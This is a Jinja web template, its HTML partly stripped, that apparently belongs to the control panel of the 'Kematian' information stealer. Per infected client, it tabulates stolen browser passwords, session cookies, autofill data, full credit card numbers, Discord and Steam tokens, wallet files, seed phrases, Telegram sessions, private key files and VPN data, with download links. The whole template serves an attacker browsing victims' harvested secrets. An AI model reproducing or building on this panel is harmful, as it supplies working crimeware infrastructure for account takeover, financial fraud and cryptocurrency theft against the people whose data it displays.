{% extends "base.html" %} {% block title %}{{ title }} · Kematian{% endblock %} {% block content %}
{{ title }} · {{ rows|length }} total{% if client_filter %} · clear filter{% endif %}
{% if client_filter and key in ['wallets','telegram','gaming','files','keys'] %} {% endif %}| URL | Username | Password | Browser | {% endif %} {% if key == 'cookies' %}Host | Name | Value | Browser | {% endif %} {% if key == 'autofill' %}Field | Value | Browser | {% endif %} {% if key == 'history' %}URL | Title | Visits | Last visit | {% endif %} {% if key == 'bookmarks' %}Name | URL | Type | {% endif %} {% if key == 'credit_cards' %}Card | Holder | Exp | Browser | {% endif %} {% if key == 'discord_tokens' %}Token | Source | {% endif %} {% if key == 'files' %}Name | Size | Path | {% endif %} {% if key == 'extensions' %}Name | Version | Browser | ID | {% endif %} {% if key == 'wallets' %}Name | Type | Size | Addresses | {% endif %} {% if key == 'telegram' %}Account | Files | Size | Path | {% endif %} {% if key == 'keys' %}Type | Name | Size | Path | {% endif %} {% if key in ['wallets','telegram','gaming'] %}Files | {% endif %} {% if key == 'app_credentials' %}App | Host | Username | Password | {% endif %} {% if key == 'seeds' %}Phrase | Source | Words | {% endif %} {% if key == 'gaming' %}Platform | Data | {% endif %} {% if key == 'steam_tokens' %}Steam ID | Token | {% endif %} {% if key == 'vpns' %}VPN | Data | {% endif %}Client |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| {{ r['url'] or '' }} | {{ r['username'] or '' }} | {{ r['password'] or '' }} | {{ r['browser'] or '' }} | {% endif %} {% if key == 'cookies' %}{{ r['host'] or '' }} | {{ r['name'] or '' }} | {{ r['value'] or '' }} | {{ r['browser'] or '' }} | {% endif %} {% if key == 'autofill' %}{{ r['name'] or '' }} | {{ r['value'] or '' }} | {{ r['browser'] or '' }} | {% endif %} {% if key == 'history' %}{{ r['url'] or '' }} | {{ r['title'] or '' }} | {{ r['visit_count'] or 0 }} | {{ (r['last_visit_time'] | datetime) if r['last_visit_time'] else '—' }} | {% endif %} {% if key == 'bookmarks' %}{{ r['name'] or '' }} | {{ r['url'] or '' }} | {{ r['type'] or '' }} | {% endif %} {% if key == 'credit_cards' %}{{ r['card_number'] or '' }} | {{ r['name_on_card'] or '' }} | {{ r['expiration_month'] or '?' }}/{{ r['expiration_year'] or '?' }} | {{ r['browser'] or '' }} | {% endif %} {% if key == 'discord_tokens' %}{{ r['token'] or '' }} | {{ r['source'] or '' }} | {% endif %} {% if key == 'files' %}{{ r['name'] or '' }} | {{ (r['size'] | filesize) }} | {{ r['path'] or '' }} | {% endif %} {% if key == 'extensions' %}{{ r['name'] or '' }} | {{ r['version'] or '' }} | {{ r['browser'] or '' }} | {{ r['ext_id'] or '' }} | {% endif %} {% if key == 'wallets' %}{{ r['name'] or '' }} | {{ r['type'] or '' }} | {{ (r['size'] | filesize) }} | {{ r['addresses'] or '' }} | {% endif %} {% if key == 'telegram' %}{{ r['account'] or '' }} | {{ r['files'] or 0 }} | {{ (r['size'] | filesize) }} | {{ r['path'] or '' }} | {% endif %} {% if key == 'keys' %}{{ r['type'] or '' }} | {{ r['name'] or '' }} | {{ (r['size'] | filesize) }} | {{ r['path'] or '' }} | {% endif %} {% if key in ['wallets','telegram','gaming'] %}Download | {% endif %} {% if key == 'app_credentials' %}{{ r['application'] or '' }} | {{ r['host'] or '' }} | {{ r['username'] or '' }} | {{ r['password'] or '' }} | {% endif %} {% if key == 'seeds' %}{{ r['phrase'] or '' }} | {{ r['source'] or '' }} | {{ r['words'] or 0 }} | {% endif %} {% if key == 'gaming' %}{{ r['platform'] or '' }} | {{ (r['payload'] or '')[:60] }}{% if r['payload'] and r['payload']|length > 60 %}…{% endif %} | {% endif %} {% if key == 'steam_tokens' %}{{ r['steam_id'] or '' }} | {{ r['token'] or '' }} | {% endif %} {% if key == 'vpns' %}{{ r['vpn'] or '' }} | {{ (r['payload'] or '')[:60] }}{% if r['payload'] and r['payload']|length > 60 %}…{% endif %} | {% endif %}{{ r.client_id }} |
| No {{ label|lower }} yet. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||